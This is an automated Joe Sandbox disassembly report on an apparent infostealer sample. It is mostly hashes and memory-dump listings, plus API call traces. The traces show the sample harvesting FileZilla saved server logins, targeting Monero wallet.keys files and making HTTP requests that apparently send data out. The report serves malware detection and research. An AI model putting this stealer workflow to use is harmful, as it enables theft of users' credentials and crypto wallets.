                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: $R|
                              • API String ID: 0-669679497
                              • Opcode ID: ad7201a3f198f967071ba9123c5da168f4eee774d28b6acae2308488e2dc2a11
                              • Instruction ID: c323bba091a9194d37e4ef3f99a962a25f88a4799c13deb3b326eaf902cf02bf
                              • Opcode Fuzzy Hash: ad7201a3f198f967071ba9123c5da168f4eee774d28b6acae2308488e2dc2a11
                              • Instruction Fuzzy Hash: A731D0F3E065101BF3485878DD657B6A68AD7D4331F3B863EEA4AD7788EC798C460290
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798849780.0000000000EAE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                              • Associated: 00000000.00000002.1798710835.0000000000C50000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798722165.0000000000D01000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798722165.0000000000D0D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798722165.0000000000D32000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798722165.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798849780.0000000001040000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798849780.000000000112B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798849780.0000000001152000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798849780.000000000115B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798849780.0000000001169000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1799112151.000000000116A000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1799226557.0000000001315000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1799238668.0000000001316000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: a17bd4057304aa4459635d8e19b0c7f44ca2c2436d20b54d9c1938fc7d4bac1e
                              • Instruction ID: 20214e9299baad7ee7c62f0d9ab0af416079d3923b5b5ca052ab7717c7e02118
                              • Opcode Fuzzy Hash: a17bd4057304aa4459635d8e19b0c7f44ca2c2436d20b54d9c1938fc7d4bac1e
                              • Instruction Fuzzy Hash: 3C5138F3A082045FF3086A1CDC8177AB7DAEB94320F1B453DEB8993780E979680586D6
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798849780.0000000000EAE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                              • Associated: 00000000.00000002.1798710835.0000000000C50000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798722165.0000000000D01000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798722165.0000000000D0D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798722165.0000000000D32000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798722165.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798849780.0000000001040000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798849780.000000000112B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798849780.0000000001152000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798849780.000000000115B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798849780.0000000001169000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1799112151.000000000116A000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1799226557.0000000001315000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1799238668.0000000001316000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: b795271b50fbf5cfe323e8175681846d50d0420455e5b59fffc34605996afe9f
                              • Instruction ID: 29f5c550cdc0a2b2a11362c2f651d57dd748037b3ad51b276f7f7295bf5a9418
                              • Opcode Fuzzy Hash: b795271b50fbf5cfe323e8175681846d50d0420455e5b59fffc34605996afe9f
                              • Instruction Fuzzy Hash: CB4156F3B592145BF3146939ED497BBBB8BD7D0371F2AC23EE68483A88EC3519064185
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798849780.0000000000EAE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                              • Associated: 00000000.00000002.1798710835.0000000000C50000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798722165.0000000000D01000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798722165.0000000000D0D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798722165.0000000000D32000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798722165.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798849780.0000000001040000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798849780.000000000112B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798849780.0000000001152000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798849780.000000000115B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798849780.0000000001169000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1799112151.000000000116A000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1799226557.0000000001315000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1799238668.0000000001316000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 8d4ad9f2a4330267b871b0f8fdb65c05cdd0b482041c3792f97cd70087a64130
                              • Instruction ID: 50b32d830afc060c23dd579099b637644dcd82d86be50492fc6fe36f6749cbfe
                              • Opcode Fuzzy Hash: 8d4ad9f2a4330267b871b0f8fdb65c05cdd0b482041c3792f97cd70087a64130
                              • Instruction Fuzzy Hash: 5A4136F3B082149FE3546969DC857AAB7DAEB84720F17453DDB88C3380E979980187CA
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798849780.0000000001040000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                              • Associated: 00000000.00000002.1798710835.0000000000C50000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798722165.0000000000D01000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798722165.0000000000D0D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798722165.0000000000D32000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798722165.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798849780.0000000000EAE000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798849780.000000000112B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798849780.0000000001152000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798849780.000000000115B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798849780.0000000001169000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1799112151.000000000116A000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1799226557.0000000001315000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1799238668.0000000001316000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: cc5cbd7964c6e393bfac170251d069adaf7cc4011591f73e0c52d347eac81700
                              • Instruction ID: 16a36bd1e23ca608acf9aa884aef9d471def6fc7885a5d725d726634aee449e5
                              • Opcode Fuzzy Hash: cc5cbd7964c6e393bfac170251d069adaf7cc4011591f73e0c52d347eac81700
                              • Instruction Fuzzy Hash: BD4156B240C714EFD315AF2AD8816AAFBE4FF94B20F16892DE6D483250D7355880DB97
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                              • Associated: 00000000.00000002.1798710835.0000000000C50000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798722165.0000000000D01000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798722165.0000000000D0D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798722165.0000000000D32000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798722165.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798849780.0000000000EAE000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798849780.0000000001040000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798849780.000000000112B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798849780.0000000001152000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798849780.000000000115B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798849780.0000000001169000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1799112151.000000000116A000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1799226557.0000000001315000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1799238668.0000000001316000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                              • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                              • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                              • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                              APIs
                                • Part of subcall function 00C6A740: lstrcpy.KERNEL32(00C70E17,00000000), ref: 00C6A788
                                • Part of subcall function 00C68DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00C68E0B
                                • Part of subcall function 00C6A920: lstrcpy.KERNEL32(00000000,?), ref: 00C6A972
                                • Part of subcall function 00C6A920: lstrcat.KERNEL32(00000000), ref: 00C6A982
                                • Part of subcall function 00C6A8A0: lstrcpy.KERNEL32(?,00C70E17), ref: 00C6A905
                                • Part of subcall function 00C6A9B0: lstrlen.KERNEL32(?,007F90E8,?,\Monero\wallet.keys,00C70E17), ref: 00C6A9C5
                                • Part of subcall function 00C6A9B0: lstrcpy.KERNEL32(00000000), ref: 00C6AA04
                                • Part of subcall function 00C6A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C6AA12
                                • Part of subcall function 00C6A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00C6A7E6
                                • Part of subcall function 00C599C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00C599EC
                                • Part of subcall function 00C599C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00C59A11
                                • Part of subcall function 00C599C0: LocalAlloc.KERNEL32(00000040,?), ref: 00C59A31
                                • Part of subcall function 00C599C0: ReadFile.KERNEL32(000000FF,?,00000000,00C5148F,00000000), ref: 00C59A5A
                                • Part of subcall function 00C599C0: LocalFree.KERNEL32(00C5148F), ref: 00C59A90
                                • Part of subcall function 00C599C0: CloseHandle.KERNEL32(000000FF), ref: 00C59A9A
                                • Part of subcall function 00C68E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00C68E52
                              • GetProcessHeap.KERNEL32(00000000,000F423F,00C70DBA,00C70DB7,00C70DB6,00C70DB3), ref: 00C60362
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00C60369
                              • StrStrA.SHLWAPI(00000000,<Host>), ref: 00C60385
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00C70DB2), ref: 00C60393
                              • StrStrA.SHLWAPI(00000000,<Port>), ref: 00C603CF
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00C70DB2), ref: 00C603DD
                              • StrStrA.SHLWAPI(00000000,<User>), ref: 00C60419
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00C70DB2), ref: 00C60427
                              • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00C60463
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00C70DB2), ref: 00C60475
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00C70DB2), ref: 00C60502
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00C70DB2), ref: 00C6051A
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00C70DB2), ref: 00C60532
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00C70DB2), ref: 00C6054A
                              • lstrcat.KERNEL32(?,browser: FileZilla), ref: 00C60562
                              • lstrcat.KERNEL32(?,profile: null), ref: 00C60571
                              • lstrcat.KERNEL32(?,url: ), ref: 00C60580
                              • lstrcat.KERNEL32(?,00000000), ref: 00C60593
                              • lstrcat.KERNEL32(?,00C71678), ref: 00C605A2
                              • lstrcat.KERNEL32(?,00000000), ref: 00C605B5
                              • lstrcat.KERNEL32(?,00C7167C), ref: 00C605C4
                              • lstrcat.KERNEL32(?,login: ), ref: 00C605D3
                              • lstrcat.KERNEL32(?,00000000), ref: 00C605E6
                              • lstrcat.KERNEL32(?,00C71688), ref: 00C605F5
                              • lstrcat.KERNEL32(?,password: ), ref: 00C60604
                              • lstrcat.KERNEL32(?,00000000), ref: 00C60617
                              • lstrcat.KERNEL32(?,00C71698), ref: 00C60626
                              • lstrcat.KERNEL32(?,00C7169C), ref: 00C60635
                              • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00C70DB2), ref: 00C6068E
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                              • Associated: 00000000.00000002.1798710835.0000000000C50000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798722165.0000000000D01000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798722165.0000000000D0D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798722165.0000000000D32000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798722165.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798849780.0000000000EAE000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798849780.0000000001040000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798849780.000000000112B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798849780.0000000001152000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798849780.000000000115B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798849780.0000000001169000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1799112151.000000000116A000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1799226557.0000000001315000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1799238668.0000000001316000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                              • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                              • API String ID: 1942843190-555421843
                              • Opcode ID: 8e57a89e2dc57bf624d522e5d016bf96e14456f70d96c8b3aefd9a7564846d7e
                              • Instruction ID: ab6e51d7467ed2440b429f1dbe9b58ddaf709f89941dc37be53fca9d9973dfba
                              • Opcode Fuzzy Hash: 8e57a89e2dc57bf624d522e5d016bf96e14456f70d96c8b3aefd9a7564846d7e
                              • Instruction Fuzzy Hash: DDD10E719102089BCB24EBE4DDD6EEE7378EF58300F548529F506B7091DE74AA0ADFA1
                              APIs
                                • Part of subcall function 00C6A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00C6A7E6
                                • Part of subcall function 00C547B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00C54839
                                • Part of subcall function 00C547B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00C54849
                                • Part of subcall function 00C6A740: lstrcpy.KERNEL32(00C70E17,00000000), ref: 00C6A788
                              • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00C559F8
                              • StrCmpCA.SHLWAPI(?,007FE758), ref: 00C55A13
                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00C55B93
                              • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,007FE838,00000000,?,007FA330,00000000,?,00C71A1C), ref: 00C55E71
                              • lstrlen.KERNEL32(00000000), ref: 00C55E82
                              • GetProcessHeap.KERNEL32(00000000,?), ref: 00C55E93
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00C55E9A
                              • lstrlen.KERNEL32(00000000), ref: 00C55EAF
                              • lstrlen.KERNEL32(00000000), ref: 00C55ED8
                              • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00C55EF1
                              • lstrlen.KERNEL32(00000000,?,?), ref: 00C55F1B
                              • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00C55F2F
                              • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00C55F4C
                              • InternetCloseHandle.WININET(00000000), ref: 00C55FB0
                              • InternetCloseHandle.WININET(00000000), ref: 00C55FBD
                              • HttpOpenRequestA.WININET(00000000,007FE828,?,007FE338,00000000,00000000,00400100,00000000), ref: 00C55BF8
                                • Part of subcall function 00C6A9B0: lstrlen.KERNEL32(?,007F90E8,?,\Monero\wallet.keys,00C70E17), ref: 00C6A9C5
                                • Part of subcall function 00C6A9B0: lstrcpy.KERNEL32(00000000), ref: 00C6AA04
                                • Part of subcall function 00C6A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C6AA12
                                • Part of subcall function 00C6A8A0: lstrcpy.KERNEL32(?,00C70E17), ref: 00C6A905
                                • Part of subcall function 00C6A920: lstrcpy.KERNEL32(00000000,?), ref: 00C6A972
                                • Part of subcall function 00C6A920: lstrcat.KERNEL32(00000000), ref: 00C6A982
                              • InternetCloseHandle.WININET(00000000), ref: 00C55FC7
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                              • Associated: 00000000.00000002.1798710835.0000000000C50000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798722165.0000000000D01000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798722165.0000000000D0D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798722165.0000000000D32000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798722165.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798849780.0000000000EAE000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798849780.0000000001040000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798849780.000000000112B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798849780.0000000001152000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798849780.000000000115B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798849780.0000000001169000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1799112151.000000000116A000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1799226557.0000000001315000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1799238668.0000000001316000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                              • String ID: "$"$------$------$------
                              • API String ID: 874700897-2180234286
                              • Opcode ID: 3e3036e73539e3e3d836653f10888ac77b8ebe38444bcf490a861e768ea1f726
                              • Instruction ID: e7408e3ec2488fcd75b027821be56c8e958c61862e452663ffbc73a205ca2859
                              • Opcode Fuzzy Hash: 3e3036e73539e3e3d836653f10888ac77b8ebe38444bcf490a861e768ea1f726
                              • Instruction Fuzzy Hash: D612DE71820118AADB25EBA0DCD6FEEB378BF18700F5441A9F50673091EF706A49DF65
                              APIs
                                • Part of subcall function 00C6A740: lstrcpy.KERNEL32(00C70E17,00000000), ref: 00C6A788
                                • Part of subcall function 00C6A9B0: lstrlen.KERNEL32(?,007F90E8,?,\Monero\wallet.keys,00C70E17), ref: 00C6A9C5
                                • Part of subcall function 00C6A9B0: lstrcpy.KERNEL32(00000000), ref: 00C6AA04
                                • Part of subcall function 00C6A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C6AA12
                                • Part of subcall function 00C6A8A0: lstrcpy.KERNEL32(?,00C70E17), ref: 00C6A905
                                • Part of subcall function 00C68B60: GetSystemTime.KERNEL32(00C70E1A,007FA3F0,00C705AE,?,?,00C513F9,?,0000001A,00C70E1A,00000000,?,007F90E8,?,\Monero\wallet.keys,00C70E17), ref: 00C68B86
                                • Part of subcall function 00C6A920: lstrcpy.KERNEL32(00000000,?), ref: 00C6A972
                                • Part of subcall function 00C6A920: lstrcat.KERNEL32(00000000), ref: 00C6A982
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00C5CF83
                              • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00C5D0C7
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00C5D0CE
                              • lstrcat.KERNEL32(?,00000000), ref: 00C5D208
                              • lstrcat.KERNEL32(?,00C71478), ref: 00C5D217
                              • lstrcat.KERNEL32(?,00000000), ref: 00C5D22A
                              • lstrcat.KERNEL32(?,00C7147C), ref: 00C5D239
                              • lstrcat.KERNEL32(?,00000000), ref: 00C5D24C
                              • lstrcat.KERNEL32(?,00C71480), ref: 00C5D25B
                              • lstrcat.KERNEL32(?,00000000), ref: 00C5D26E
                              • lstrcat.KERNEL32(?,00C71484), ref: 00C5D27D
                              • lstrcat.KERNEL32(?,00000000), ref: 00C5D290
                              • lstrcat.KERNEL32(?,00C71488), ref: 00C5D29F
                              • lstrcat.KERNEL32(?,00000000), ref: 00C5D2B2
                              • lstrcat.KERNEL32(?,00C7148C), ref: 00C5D2C1
                              • lstrcat.KERNEL32(?,00000000), ref: 00C5D2D4
                              • lstrcat.KERNEL32(?,00C71490), ref: 00C5D2E3
                                • Part of subcall function 00C6A820: lstrlen.KERNEL32(00C54F05,?,?,00C54F05,00C70DDE), ref: 00C6A82B
                                • Part of subcall function 00C6A820: lstrcpy.KERNEL32(00C70DDE,00000000), ref: 00C6A885
                              • lstrlen.KERNEL32(?), ref: 00C5D32A
                              • lstrlen.KERNEL32(?), ref: 00C5D339
                                • Part of subcall function 00C6AA70: StrCmpCA.SHLWAPI(007F9198,00C5A7A7,?,00C5A7A7,007F9198), ref: 00C6AA8F
                              • DeleteFileA.KERNEL32(00000000), ref: 00C5D3B4
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                              • Associated: 00000000.00000002.1798710835.0000000000C50000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798722165.0000000000D01000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798722165.0000000000D0D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798722165.0000000000D32000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798722165.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798849780.0000000000EAE000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798849780.0000000001040000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798849780.000000000112B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798849780.0000000001152000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798849780.000000000115B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1798849780.0000000001169000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1799112151.000000000116A000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1799226557.0000000001315000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1799238668.0000000001316000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                              • String ID:
                              • API String ID: 1956182324-0
                              • Opcode ID: b91b379820d5b23510116f1d115c2ed3e058fb1df357fc9f278f61a4acba7700
                              • Instruction ID: 5e54fc75ad3bdef7b38456fd5e234152137e04fe795a4c7e0d28080c44aa6f5b
                              • Opcode Fuzzy Hash: b91b379820d5b23510116f1d115c2ed3e058fb1df357fc9f278f61a4acba7700
                              • Instruction Fuzzy Hash: B5E11071910104AFCB24EBA1DDD6EEE7378AF18301F14416AF507B7092DE35AA09DFA2
                              APIs
                                • Part of subcall function 00C6A740: lstrcpy.KERNEL32(00C70E17,00000000), ref: 00C6A788
                                • Part of subcall function 00C6A920: lstrcpy.KERNEL32(00000000,?), ref: 00C6A972
                                • Part of subcall function 00C6A920: lstrcat.KERNEL32(00000000), ref: 00C6A982
                                • Part of subcall function 00C6A8A0: lstrcpy.KERNEL32(?,00C70E17), ref: 00C6A905
                                • Part of subcall function 00C6A9B0: lstrlen.KERNEL32(?,007F90E8,?,\Monero\wallet.keys,00C70E17), ref: 00C6A9C5
                                • Part of subcall function 00C6A9B0: lstrcpy.KERNEL32(00000000), ref: 00C6AA04
                                • Part of subcall function 00C6A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C6AA12
                              • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,007FD548,00000000,?,00C7144C,00000000,?,?), ref: 00C5CA6C
                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 00C5CA89
                              • GetFileSize.KERNEL32(00000000,00000000), ref: 00C5CA95
                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00C5CAA8
                              • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00C5CAD9
                              • StrStrA.SHLWAPI(?,007FD560,00C70B52), ref: 00C5CAF7
                              • StrStrA.SHLWAPI(00000000,007FD590), ref: 00C5CB1E
                              • StrStrA.SHLWAPI(?,007FDC40,00000000,?,00C71458,00000000,?,00000000,00000000,?,007F9188,00000000,?,00C71454,00000000,?), ref: 00C5CCA2
                              • StrStrA.SHLWAPI(00000000,007FDDA0), ref: 00C5CCB9
                                • Part of subcall function 00C5C820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00C5C871
